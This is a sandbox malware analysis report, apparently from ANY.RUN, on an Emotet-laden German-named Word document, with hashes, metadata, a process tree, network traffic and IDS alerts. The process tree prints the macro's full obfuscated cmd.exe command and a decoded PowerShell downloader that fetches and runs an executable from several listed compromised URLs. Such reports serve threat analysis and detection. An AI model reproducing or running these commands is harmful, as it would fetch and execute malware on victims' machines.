File name: | BESTELLDETAILS_eDATEI.doc |
Full analysis: | https://app.any.run/tasks/5c5e0f0d-5d83-4bbe-81a2-971903ec9210 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 23, 2019, 08:58:29 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
MIME: | text/xml |
File info: | XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators |
MD5: | 62ABA45D0236451B22C3DE3CDF4FF4CC |
SHA1: | 6E55474451301401E24C7443979E1A9723771F4F |
SHA256: | 0B9CCB04553BA5F1CE784630EF9B2C478ED13A96E89C65DCD9C94205C235EA12 |
SSDEEP: | 3072:7kZ2tiOgmunCTcfjL/xSu90OoiLuDKZXfwKeljR1z:7kgNuCTcfxUOmD+XfwLX |
.xml | | | Microsoft Office XML Flat File Format Word Document (ASCII) (60.1) |
---|---|---|
.xml | | | Microsoft Office XML Flat File Format (ASCII) (28.6) |
.xaml | | | Microsoft Extensible Application Markup Language (7.7) |
.xml | | | Generic XML (ASCII) (2.1) |
.html | | | HyperText Markup Language (1.2) |
WordDocumentBodySectSectPrDocGridLine-pitch: | 360 |
---|---|
WordDocumentBodySectSectPrColsSpace: | 720 |
WordDocumentBodySectSectPrPgMarGutter: | - |
WordDocumentBodySectSectPrPgMarFooter: | 720 |
WordDocumentBodySectSectPrPgMarHeader: | 720 |
WordDocumentBodySectSectPrPgMarLeft: | 1440 |
WordDocumentBodySectSectPrPgMarBottom: | 1440 |
WordDocumentBodySectSectPrPgMarRight: | 1440 |
WordDocumentBodySectSectPrPgMarTop: | 1440 |
WordDocumentBodySectSectPrPgSzH: | 15840 |
WordDocumentBodySectSectPrPgSzW: | 12240 |
WordDocumentBodySectSectPrRsidR: | 005E6EE1 |
WordDocumentBodySectPRPictShapeImagedataTitle: | - |
WordDocumentBodySectPRPictShapeImagedataSrc: | wordml://02000001.jpg |
WordDocumentBodySectPRPictShapeStyle: | width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square |
WordDocumentBodySectPRPictShapeType: | #_x0000_t75 |
WordDocumentBodySectPRPictShapeSpid: | _x0000_i1025 |
WordDocumentBodySectPRPictShapeId: | Picture 1 |
WordDocumentBodySectPRPictBinData: | (Binary data 145376 bytes, use -b option to extract) |
WordDocumentBodySectPRPictBinDataName: | wordml://02000001.jpg |
WordDocumentBodySectPRPictShapetypeLockAspectratio: | t |
WordDocumentBodySectPRPictShapetypeLockExt: | edit |
WordDocumentBodySectPRPictShapetypePathConnecttype: | rect |
WordDocumentBodySectPRPictShapetypePathGradientshapeok: | t |
WordDocumentBodySectPRPictShapetypePathExtrusionok: | f |
WordDocumentBodySectPRPictShapetypeFormulasFEqn: | if lineDrawn pixelLineWidth 0 |
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: | miter |
WordDocumentBodySectPRPictShapetypeStroked: | f |
WordDocumentBodySectPRPictShapetypeFilled: | f |
WordDocumentBodySectPRPictShapetypePath: | m@4@5l@4@11@9@11@9@5xe |
WordDocumentBodySectPRPictShapetypePreferrelative: | t |
WordDocumentBodySectPRPictShapetypeSpt: | 75 |
WordDocumentBodySectPRPictShapetypeCoordsize: | 21600,21600 |
WordDocumentBodySectPRPictShapetypeId: | _x0000_t75 |
WordDocumentBodySectPRRPrNoProof: | - |
WordDocumentBodySectPRRsidRPr: | 00F17EA2 |
WordDocumentBodySectPRsidRDefault: | 00187F7A |
WordDocumentBodySectPRsidR: | 005E6EE1 |
WordDocumentDocPrRsidsRsidVal: | 00187F7A |
WordDocumentDocPrRsidsRsidRootVal: | 005E6EE1 |
WordDocumentDocPrCompatDontGrowAutofit: | - |
WordDocumentDocPrCompatUseAsianBreakRules: | - |
WordDocumentDocPrCompatWrapTextWithPunct: | - |
WordDocumentDocPrCompatSnapToGridInCell: | - |
WordDocumentDocPrCompatBreakWrappedTables: | - |
WordDocumentDocPrAlwaysShowPlaceholderTextVal: | off |
WordDocumentDocPrIgnoreMixedContentVal: | off |
WordDocumentDocPrSaveInvalidXMLVal: | off |
WordDocumentDocPrValidateAgainstSchema: | - |
WordDocumentDocPrPixelsPerInchVal: | 120 |
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: | - |
WordDocumentDocPrOptimizeForBrowser: | - |
WordDocumentDocPrCharacterSpacingControlVal: | DontCompress |
WordDocumentDocPrPunctuationKerning: | - |
WordDocumentDocPrDefaultTabStopVal: | 720 |
WordDocumentDocPrDoNotEmbedSystemFonts: | - |
WordDocumentDocPrRemovePersonalInformation: | - |
WordDocumentDocPrZoomPercent: | 100 |
WordDocumentDocPrViewVal: | |
WordDocumentShapeDefaultsShapelayoutIdmapData: | 1 |
WordDocumentShapeDefaultsShapelayoutIdmapExt: | edit |
WordDocumentShapeDefaultsShapelayoutExt: | edit |
WordDocumentShapeDefaultsShapedefaultsSpidmax: | 1026 |
WordDocumentShapeDefaultsShapedefaultsExt: | edit |
WordDocumentDocSuppDataBinData: | (binary data omitted) |
WordDocumentDocSuppDataBinDataName: | editdata.mso |
WordDocumentStylesStyleRPrRFontsCs: | Tahoma |
WordDocumentStylesStyleRPrRFontsH-ansi: | Tahoma |
WordDocumentStylesStyleRPrRFontsAscii: | Tahoma |
WordDocumentStylesStyleRsidVal: | 005A24B1 |
WordDocumentStylesStyleLinkVal: | BalloonTextChar |
WordDocumentStylesStyleBasedOnVal: | Normal |
WordDocumentStylesStyleTblPrTblCellMarRightType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarRightW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarBottomType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarBottomW: | - |
WordDocumentStylesStyleTblPrTblCellMarLeftType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarLeftW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarTopType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarTopW: | - |
WordDocumentStylesStyleTblPrTblIndType: | dxa |
WordDocumentStylesStyleTblPrTblIndW: | - |
WordDocumentStylesStyleUiNameVal: | Table Normal |
WordDocumentStylesStyleRPrLangBidi: | AR-SA |
WordDocumentStylesStyleRPrLangFareast: | EN-US |
WordDocumentStylesStyleRPrLangVal: | EN-US |
WordDocumentStylesStyleRPrSz-csVal: | 22 |
WordDocumentStylesStyleRPrSzVal: | 22 |
WordDocumentStylesStyleRPrFontVal: | Calibri |
WordDocumentStylesStylePPrSpacingLine-rule: | auto |
WordDocumentStylesStylePPrSpacingLine: | 259 |
WordDocumentStylesStylePPrSpacingAfter: | 160 |
WordDocumentStylesStyleNameVal: | Normal |
WordDocumentStylesStyleStyleId: | Normal |
WordDocumentStylesStyleDefault: | on |
WordDocumentStylesStyleType: | paragraph |
WordDocumentStylesLatentStylesLsdExceptionName: | Normal |
WordDocumentStylesLatentStylesLatentStyleCount: | 375 |
WordDocumentStylesLatentStylesDefLockedState: | off |
WordDocumentStylesVersionOfBuiltInStylenamesVal: | 7 |
WordDocumentFontsFontSigCsb-1: | 00000000 |
WordDocumentFontsFontSigCsb-0: | 000001FF |
WordDocumentFontsFontSigUsb-3: | 00000000 |
WordDocumentFontsFontSigUsb-2: | 00000009 |
WordDocumentFontsFontSigUsb-1: | C0007841 |
WordDocumentFontsFontSigUsb-0: | E0002AFF |
WordDocumentFontsFontPitchVal: | variable |
WordDocumentFontsFontFamilyVal: | Roman |
WordDocumentFontsFontCharsetVal: | 00 |
WordDocumentFontsFontPanose-1Val: | 02020603050405020304 |
WordDocumentFontsFontName: | Times New Roman |
WordDocumentFontsDefaultFontsCs: | Times New Roman |
WordDocumentFontsDefaultFontsH-ansi: | Calibri |
WordDocumentFontsDefaultFontsFareast: | Calibri |
WordDocumentFontsDefaultFontsAscii: | Calibri |
WordDocumentDocumentPropertiesVersion: | 16 |
WordDocumentDocumentPropertiesCharactersWithSpaces: | 1 |
WordDocumentDocumentPropertiesParagraphs: | 1 |
WordDocumentDocumentPropertiesLines: | 1 |
WordDocumentDocumentPropertiesCharacters: | 1 |
WordDocumentDocumentPropertiesWords: | - |
WordDocumentDocumentPropertiesPages: | 1 |
WordDocumentDocumentPropertiesLastSaved: | 2019:01:22 19:45:00Z |
WordDocumentDocumentPropertiesCreated: | 2019:01:22 19:45:00Z |
WordDocumentDocumentPropertiesTotalTime: | - |
WordDocumentDocumentPropertiesRevision: | 1 |
WordDocumentIgnoreSubtreeVal: | http://schemas.microsoft.com/office/word/2003/wordml/sp2 |
WordDocumentOcxPresent: | no |
WordDocumentEmbeddedObjPresent: | no |
WordDocumentMacrosPresent: | yes |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2944 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\BESTELLDETAILS_eDATEI.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 | ||||
4024 | c:\w8525\l1499\r2543\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set lkQi=:~pW7U+P@j20CTw-z\k9bxZ/A5fqt=Ryvgl%EGJ(18u;'6KS.LO{h} XDsie$rcm3aMdBF)oN4n,I&&for %f in (2;71;14;35;7;5;68;49;76;12;0;1;25;75;40;35;61;35;47;36;47;47;76;50;72;72;24;66;36;0;1;15;73;75;40;35;52;35;13;36;66;7;0;1;15;64;75;40;35;34;34;54;60;20;45;25;19;25;29;44;2;4;45;41;25;44;43;60;62;45;41;19;73;29;74;59;14;15;71;20;9;59;62;28;54;72;59;28;48;3;59;20;12;34;58;59;74;28;43;60;58;73;4;45;25;29;44;52;28;28;2;0;23;23;9;42;63;59;57;65;63;59;67;58;74;65;48;62;71;63;23;69;46;62;55;34;28;30;65;8;52;28;28;2;0;23;23;63;65;61;58;2;71;57;65;2;34;42;57;48;62;71;63;23;58;67;31;42;67;38;16;67;8;52;28;28;2;0;23;23;20;34;65;63;67;58;33;58;28;65;34;48;62;71;63;23;67;62;10;62;56;58;11;8;52;28;28;2;0;23;23;67;71;62;42;63;59;74;28;65;28;58;71;74;15;62;71;74;28;59;57;28;48;62;71;63;23;24;7;31;10;7;66;61;26;67;71;8;52;28;28;2;0;23;23;59;74;59;61;9;58;58;18;34;58;63;34;59;74;67;58;61;63;59;48;62;71;63;23;14;2;15;65;67;63;58;74;23;62;57;57;23;22;31;50;13;45;34;28;63;74;49;44;48;47;2;34;58;28;39;44;8;44;70;43;60;27;19;73;19;45;29;44;57;64;45;45;4;44;43;60;14;64;25;10;73;54;29;54;44;41;4;64;44;43;60;62;73;10;19;40;29;44;67;45;41;40;40;44;43;60;52;45;64;25;11;29;60;59;74;32;0;28;59;63;2;6;44;17;44;6;60;14;64;25;10;73;6;44;48;59;21;59;44;43;26;71;61;59;65;62;52;39;60;18;10;73;11;41;54;58;74;54;60;58;73;4;45;25;70;51;28;61;31;51;60;62;45;41;19;73;48;56;71;14;74;34;71;65;67;69;58;34;59;39;60;18;10;73;11;41;75;54;60;52;45;64;25;11;70;43;60;9;64;45;73;19;29;44;2;45;45;4;64;44;43;76;26;54;39;39;37;59;28;15;76;28;59;63;54;60;52;45;64;25;11;70;48;34;59;74;33;28;52;54;15;33;59;54;73;11;11;11;11;70;54;51;76;74;32;71;18;59;15;76;28;59;63;54;60;52;45;64;25;11;43;60;9;4;4;73;19;29;44;58;19;41;41;25;44;43;20;61;59;65;18;43;53;53;62;65;28;62;52;51;53;53;60;2;45;10;73;19;29;44;67;73;4;25;25;44;43;78)do set 3ud2=!3ud2!!lkQi:~%f,1!&&if %f equ 78 echo !3ud2:*3ud2!=!|cmd.exe" | 
c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2524 | CmD /V:ON/C"set lkQi=:~pW7U+P@j20CTw-z\k9bxZ/A5fqt=Ryvgl%EGJ(18u;'6KS.LO{h} XDsie$rcm3aMdBF)oN4n,I&&for %f in (2;71;14;35;7;5;68;49;76;12;0;1;25;75;40;35;61;35;47;36;47;47;76;50;72;72;24;66;36;0;1;15;73;75;40;35;52;35;13;36;66;7;0;1;15;64;75;40;35;34;34;54;60;20;45;25;19;25;29;44;2;4;45;41;25;44;43;60;62;45;41;19;73;29;74;59;14;15;71;20;9;59;62;28;54;72;59;28;48;3;59;20;12;34;58;59;74;28;43;60;58;73;4;45;25;29;44;52;28;28;2;0;23;23;9;42;63;59;57;65;63;59;67;58;74;65;48;62;71;63;23;69;46;62;55;34;28;30;65;8;52;28;28;2;0;23;23;63;65;61;58;2;71;57;65;2;34;42;57;48;62;71;63;23;58;67;31;42;67;38;16;67;8;52;28;28;2;0;23;23;20;34;65;63;67;58;33;58;28;65;34;48;62;71;63;23;67;62;10;62;56;58;11;8;52;28;28;2;0;23;23;67;71;62;42;63;59;74;28;65;28;58;71;74;15;62;71;74;28;59;57;28;48;62;71;63;23;24;7;31;10;7;66;61;26;67;71;8;52;28;28;2;0;23;23;59;74;59;61;9;58;58;18;34;58;63;34;59;74;67;58;61;63;59;48;62;71;63;23;14;2;15;65;67;63;58;74;23;62;57;57;23;22;31;50;13;45;34;28;63;74;49;44;48;47;2;34;58;28;39;44;8;44;70;43;60;27;19;73;19;45;29;44;57;64;45;45;4;44;43;60;14;64;25;10;73;54;29;54;44;41;4;64;44;43;60;62;73;10;19;40;29;44;67;45;41;40;40;44;43;60;52;45;64;25;11;29;60;59;74;32;0;28;59;63;2;6;44;17;44;6;60;14;64;25;10;73;6;44;48;59;21;59;44;43;26;71;61;59;65;62;52;39;60;18;10;73;11;41;54;58;74;54;60;58;73;4;45;25;70;51;28;61;31;51;60;62;45;41;19;73;48;56;71;14;74;34;71;65;67;69;58;34;59;39;60;18;10;73;11;41;75;54;60;52;45;64;25;11;70;43;60;9;64;45;73;19;29;44;2;45;45;4;64;44;43;76;26;54;39;39;37;59;28;15;76;28;59;63;54;60;52;45;64;25;11;70;48;34;59;74;33;28;52;54;15;33;59;54;73;11;11;11;11;70;54;51;76;74;32;71;18;59;15;76;28;59;63;54;60;52;45;64;25;11;43;60;9;4;4;73;19;29;44;58;19;41;41;25;44;43;20;61;59;65;18;43;53;53;62;65;28;62;52;51;53;53;60;2;45;10;73;19;29;44;67;73;4;25;25;44;43;78)do set 3ud2=!3ud2!!lkQi:~%f,1!&&if %f equ 78 echo !3ud2:*3ud2!=!|cmd.exe" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2520 | C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $b6595='p7685';$c6894=new-object Net.WebClient;$i4765='http://jumesamedina.com/FKcXltRa@http://mariposaplus.com/idyudJzd@http://blamdigital.com/dc2cDi0@http://documentation-contest.com/APy2PMrfdo@http://enerjiiklimlendirme.com/wp-admin/css/ZyOT6ltmnL'.Split('@');$q9496='s3667';$w3524 = '873';$c4291='d6811';$h6350=$env:temp+'\'+$w3524+'.exe';foreach($k2408 in $i4765){try{$c6894.DownloadFile($k2408, $h6350);$j3649='p6673';If ((Get-Item $h6350).length -ge 40000) {Invoke-Item $h6350;$j7749='i9885';break;}}catch{}}$p6249='d4755';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2628 | cmd.exe | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3064 | powershell $b6595='p7685';$c6894=new-object Net.WebClient;$i4765='http://jumesamedina.com/FKcXltRa@http://mariposaplus.com/idyudJzd@http://blamdigital.com/dc2cDi0@http://documentation-contest.com/APy2PMrfdo@http://enerjiiklimlendirme.com/wp-admin/css/ZyOT6ltmnL'.Split('@');$q9496='s3667';$w3524 = '873';$c4291='d6811';$h6350=$env:temp+'\'+$w3524+'.exe';foreach($k2408 in $i4765){try{$c6894.DownloadFile($k2408, $h6350);$j3649='p6673';If ((Get-Item $h6350).length -ge 40000) {Invoke-Item $h6350;$j7749='i9885';break;}}catch{}}$p6249='d4755'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2740 | "C:\Users\admin\AppData\Local\Temp\873.exe" | C:\Users\admin\AppData\Local\Temp\873.exe | — | powershell.exe |
User: admin Company: Networks Associates Technology, Inc Integrity Level: MEDIUM Exit code: 0 Version: 8, 0, 0, 26 | ||||
3856 | "C:\Users\admin\AppData\Local\Temp\873.exe" | C:\Users\admin\AppData\Local\Temp\873.exe | 873.exe | |
User: admin Company: Networks Associates Technology, Inc Integrity Level: MEDIUM Exit code: 0 Version: 8, 0, 0, 26 | ||||
3116 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | — | 873.exe |
User: admin Company: Networks Associates Technology, Inc Integrity Level: MEDIUM Exit code: 0 Version: 8, 0, 0, 26 | ||||
3740 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | wabmetagen.exe | |
User: admin Company: Networks Associates Technology, Inc Integrity Level: MEDIUM Version: 8, 0, 0, 26 |

PID | Process | Filename | Type | |
---|---|---|---|---|
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE2D2.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9DDBFCAC.jpg | — | |
MD5:— | SHA256:— | |||
3064 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YD2NWCWH3SM34JN27CF8.temp | — | |
MD5:— | SHA256:— | |||
3064 | powershell.exe | C:\Users\admin\AppData\Local\Temp\873.exe | — | |
MD5:— | SHA256:— | |||
3856 | 873.exe | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | executable | |
MD5:33F321CF092CF8E1E27558BDD1E71FB8 | SHA256:5AF77B93FD2E80082633BDDF2385DA567EBAE175736BD1EDB4888846B99376BB | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:7D7181CFA0E7285ADF1AF9C2BFB2ABD9 | SHA256:0F5EC33E85B5619C5E7C802F5BA83671BED5E5DC231501C89D344817066A69AA | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:562FE999368B94AB908D9AA32036F8F0 | SHA256:D8AA20CC6D16C82CDE094ECFFA046902F9E2298F557272AA4FD9DAB504034E3C | |||
3064 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f2ef.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
3064 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$STELLDETAILS_eDATEI.doc | pgc | |
MD5:A759DC460B990171BE70709F211C862E | SHA256:FAD31F9BA7C958829E5F72123C9D0AA4BDEBE2A63395715ECDDE8462121A8712 |

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3064 | powershell.exe | GET | 200 | 216.15.213.103:80 | http://blamdigital.com/cgi-sys/suspendedpage.cgi | US | html | 7.41 Kb | malicious |
3064 | powershell.exe | GET | 404 | 164.138.208.39:80 | http://jumesamedina.com/FKcXltRa | ES | html | 325 b | malicious |
3740 | wabmetagen.exe | GET | — | 200.125.113.60:8080 | http://200.125.113.60:8080/ | AR | — | — | malicious |
3064 | powershell.exe | GET | 302 | 216.15.213.103:80 | http://blamdigital.com/dc2cDi0 | US | html | 232 b | malicious |
3740 | wabmetagen.exe | GET | — | 200.68.61.242:8080 | http://200.68.61.242:8080/ | CL | — | — | malicious |
3064 | powershell.exe | GET | 503 | 213.202.100.12:80 | http://documentation-contest.com/APy2PMrfdo | HR | html | 398 b | malicious |
3064 | powershell.exe | GET | 200 | 94.73.146.142:80 | http://enerjiiklimlendirme.com/wp-admin/css/ZyOT6ltmnL/ | TR | executable | 192 Kb | malicious |
3740 | wabmetagen.exe | GET | 200 | 189.250.153.215:443 | http://189.250.153.215:443/ | MX | binary | 132 b | malicious |
3064 | powershell.exe | GET | 301 | 94.73.146.142:80 | http://enerjiiklimlendirme.com/wp-admin/css/ZyOT6ltmnL | TR | html | 617 b | malicious |
3064 | powershell.exe | GET | 404 | 45.252.248.16:80 | http://mariposaplus.com/idyudJzd | VN | html | 1.12 Kb | malicious |

PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3064 | powershell.exe | 164.138.208.39:80 | jumesamedina.com | Cyberneticos Hosting SL | ES | malicious |
3064 | powershell.exe | 45.252.248.16:80 | mariposaplus.com | AZDIGI Corporation | VN | malicious |
3064 | powershell.exe | 216.15.213.103:80 | blamdigital.com | CYBERCON, INC. | US | malicious |
3064 | powershell.exe | 213.202.100.12:80 | documentation-contest.com | ISKON INTERNET d.d. za informatiku i telekomunikacije | HR | malicious |
3064 | powershell.exe | 94.73.146.142:80 | enerjiiklimlendirme.com | Cizgi Telekomunikasyon Anonim Sirketi | TR | malicious |
3740 | wabmetagen.exe | 190.216.238.62:22 | — | Level 3 Communications, Inc. | VE | malicious |
3740 | wabmetagen.exe | 200.125.113.60:8080 | — | Telecentro S.A. | AR | malicious |
3740 | wabmetagen.exe | 189.250.153.215:443 | — | Uninet S.A. de C.V. | MX | malicious |
3740 | wabmetagen.exe | 75.159.115.228:990 | — | TELUS Communications Inc. | CA | malicious |
3740 | wabmetagen.exe | 200.68.61.242:8080 | — | CTC. CORP S.A. (TELEFONICA EMPRESAS) | CL | malicious |

Domain | IP | Reputation |
---|---|---|
jumesamedina.com | | malicious |
mariposaplus.com | | malicious |
blamdigital.com | | malicious |
documentation-contest.com | | malicious |
enerjiiklimlendirme.com | | malicious |
dns.msftncsi.com | | shared |

PID | Process | Class | Message |
---|---|---|---|
3064 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3064 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3064 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3064 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3064 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3064 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3064 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious redirect to 'suspendedpage.cgi' |
3064 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3064 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3064 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |